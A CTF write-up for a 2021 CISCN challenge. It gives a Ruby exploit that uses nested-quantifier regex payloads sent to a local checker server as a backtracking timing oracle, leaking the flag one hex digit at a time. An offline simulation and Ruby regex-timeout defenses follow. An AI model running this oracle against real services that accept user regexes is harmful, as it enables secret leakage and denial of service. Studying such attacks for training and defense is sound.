Time-based blind regular expression injection

Paper / original write-up: https://diary.shift-js.info/blind-regular-expression-injection/

2021 CISCN regular-expression blind injection exploit (exp). The checker takes an attacker-controlled regex, so the payload `^(?=<prefix>)((.*)*)*<random suffix>$` turns it into a timing oracle: the lookahead is zero-width, so when `<prefix>` matches the start of the flag the nested quantifier `((.*)*)*` still backtracks over the whole flag before the unmatchable suffix fails the match, and the request stalls; when the prefix is wrong the lookahead fails at once and the response comes back immediately. The flag is recovered one hex digit at a time from that difference.

```ruby
require 'net/http'
require 'uri'

CHALLENGE = 'http://127.0.0.1:4567/'

# Hex-encode a string: the checker takes the regex as hex in the URL path.
String.class_eval do
  def hex
    res = ''
    each_byte { |i| res += "%02x" % i }
    res
  end
end

# Random alphanumeric suffix, used as a tail the flag will never contain, so the
# regex as a whole can never match and has to backtrack to exhaustion.
def random(len)
  chars = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
  s = ""
  1.upto(len) { s << chars.sample }   # rand(chars.size - 1) could never pick the last char
  s
end

# Send ^(?=<reg>)((.*)*)*<suffix> to the checker. If <reg> matches the start of
# the flag the lookahead passes and ((.*)*)* backtracks exponentially over the
# whole flag; otherwise the lookahead fails immediately and the request is fast.
def check_result(reg, suffix)
  full_regexp = "^(?=" + reg + ")((.*)*)*" + suffix
  p full_regexp
  uri = URI(CHALLENGE + 'check/' + full_regexp.hex)
  Net::HTTP.get_response(uri)
end

# Extend the known prefix one hex digit at a time. A response body containing
# "False" is the signal this exploit treats as "prefix correct" (the slow path).
def leak(flag, r)
  chars = '0123456789abcdef'
  (0..15).each do |i|
    if check_result(flag + chars[i], r).body["False"]
      p flag + chars[i]
      return leak(flag + chars[i], r)
    end
  end
  flag   # no digit extended the prefix: the flag is complete
end

r = random(10) + '$'
p leak('', r)

# Recovered flag:
# "facdf9972bb5fdf9c35d6e09770e9af7"
```
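Added example (not part of the original post or of the CISCN challenge): the same oracle run entirely in-process in Ruby, with a constructed flag and a constructed suffix standing in for the server at http://127.0.0.1:4567/. `build_payload` reproduces the exploit's regex, `stalls?` plays the role of the server-side timeout, and `leak_flag` is the per-digit loop with the oracle passed in as a block, so the same loop works over HTTP or locally. The names `hex_encode`, `build_payload`, `stalls?`, `leak_flag`, `SUFFIX` and `LIMIT` are assumptions of this example, not identifiers from the page.

```ruby
require 'timeout'

# Constructed stand-in for the challenge: the flag lives in this process instead
# of behind /check/<hex>, so the oracle can be exercised offline.
FLAG = 'facdf9972bb5fdf9c35d6e09770e9af7'.freeze
HEX_DIGITS = '0123456789abcdef'.freeze
SUFFIX = 'NOTINFLAG'.freeze   # constructed: uppercase letters never occur in a hex flag
LIMIT = 0.1                   # seconds before a match attempt counts as "stalled"

# Same hex transport encoding the exploit puts in the URL path.
def hex_encode(str)
  str.unpack1('H*')
end

# Same payload shape as the exploit. The lookahead is zero-width, so ((.*)*)*
# always starts at offset 0 and backtracks over the whole flag however long the
# guessed prefix is; the suffix guarantees the overall match can never succeed.
def build_payload(prefix, suffix = SUFFIX)
  "^(?=#{prefix})((.*)*)*#{suffix}$"
end

# Timing oracle: true when matching the payload against `flag` runs past `limit`
# seconds. Ruby 3.2+ memoizes many nested quantifiers (and offers Regexp.timeout=),
# so on a newer engine the correct prefix may no longer stall.
def stalls?(flag, payload, limit: LIMIT)
  Timeout.timeout(limit) { flag.match?(Regexp.new(payload)) }
  false
rescue Timeout::Error
  true
end

# Generic leak loop, independent of how the oracle is answered: extend the
# recovered prefix with the first digit the oracle confirms, stop when none does.
def leak_flag(alphabet: HEX_DIGITS, &oracle)
  recovered = ''
  loop do
    hit = alphabet.each_char.find { |c| oracle.call(recovered + c) }
    return recovered if hit.nil?
    recovered << hit
  end
end

if __FILE__ == $PROGRAM_NAME
  right = build_payload('f')   # FLAG starts with 'f'
  wrong = build_payload('0')
  puts "on the wire: /check/#{hex_encode(right)}"
  puts "correct prefix stalls: #{stalls?(FLAG, right)}"
  puts "wrong prefix stalls:   #{stalls?(FLAG, wrong)}"
  # Drive the leak with the timing oracle, exactly as the exploit does over HTTP.
  puts "leaked: #{leak_flag { |guess| stalls?(FLAG, build_payload(guess)) }.inspect}"
end
```

Running the file prints the hex the exploit would put in the URL, shows the correct prefix stalling while the wrong one returns immediately, and then leaks the constructed flag digit by digit. The stall is engine-dependent: Ruby 3.2 added memoization for nested quantifiers together with `Regexp.timeout=`, and later releases extended that memoization, so against a current Ruby the correct prefix may not be slow at all; measure before trusting the oracle. The same facts cut the other way for a defender: set `Regexp.timeout=` process-wide (Ruby 3.2+) and refuse to compile a user-supplied pattern unless `Regexp.linear_time?` accepts it.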
Author: vague huang
Posted on: 2021-08-26
Updated on: 2021-08-26